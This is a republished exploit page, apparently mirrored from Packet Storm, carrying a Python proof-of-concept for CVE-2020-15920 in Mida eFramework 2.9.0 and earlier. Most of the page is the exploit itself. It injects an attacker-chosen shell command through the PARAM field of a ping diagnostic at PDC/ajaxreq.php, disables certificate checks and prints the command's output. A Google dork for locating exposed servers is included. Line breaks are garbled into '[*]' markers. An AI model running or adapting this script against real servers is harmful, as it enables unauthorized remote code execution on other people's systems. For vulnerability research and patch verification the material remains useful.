Mida eFramework 2.9.0 Remote Code Execution ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on August 28th, 2020 📆 | 4859 Views ⚑

0

Mida eFramework 2.9.0 Remote Code Execution ≈ Packet Storm

[*]# Exploit Title: Mida eFramework 2.9.0 – Remote Code Execution[*]# Google Dork: Server: Mida eFramework[*]# Date: 2020-08-27[*]# Exploit Author: elbae[*]# Vendor Homepage: https://www.midasolutions.com/[*]# Software Link: http://ova-efw.midasolutions.com/[*]# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html[*]# Version: < = 2.9.0[*]# CVE : CVE-2020-15920

#! /usr/bin/python3[*]# -*- coding: utf-8 -*-

import argparse[*]import requests[*]import subprocess[*]from requests.packages.urllib3.exceptions import InsecureRequestWarning[*]requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_disclaimer():[*]print(“””[*]———————[*]Disclaimer:[*]1) For testing purpose only.[*]2) Do not attack production environments.[*]3) Intended for educational purposes only and cannot be used for law[*]violation or personal gain.[*]4) The author is not responsible for any possible harm caused by this[*]material.[*]———————“””)

def print_info():[*]print(“””[*][*] PoC exploit for Mida eFramework < = 2.9.0 PDC (CVE-2020-15920)[*][*] Reference:[*]https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html[*][*] Vulnerability: OS Command Injection Remote Code Execution Vulnerability[*](RCE) in PDC/ajaxreq.php[*]Versiont< 2.9.0t./CVE-2020-15920[*]http://192.168.1.60:8090/PDC/ajaxreq.php id[*]Versiont2.9.0t./CVE-2020-15920 https://192.168.1.60/PDC/ajaxreq.php[*]id """)

def pwn(url,cmd):[*]running = “””[*][*] Target URL: {0}[*][*] Command: {1}[*]”””[*]print(running.format(url,cmd))[*]data = {[*]”DIAGNOSIS”:”PING”,[*]”PARAM”:”127.0.0.1 -c 0; {0}”.format(cmd)[*]}[*]r = requests.post(url,data=data,verify=False)[*]line = “[*]”+”-“*20+” Output ” + “-” *20 +”[*]”[*]pretty_output = r.text.replace(‘
‘,’n’)[*]print(line+”n{0}n”.format(pretty_output)+line)

def main():[*]print_info()[*]print_disclaimer()[*]parser = argparse.ArgumentParser()[*]parser.add_argument(“target”, type=str, help=”the complete target URL”)[*]parser.add_argument(“cmd”, type=str, help=”the command you want to run”)[*]args = parser.parse_args()[*]pwn(args.target, args.cmd)

if __name__ == ‘__main__’:[*]main()[*]

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *


loading...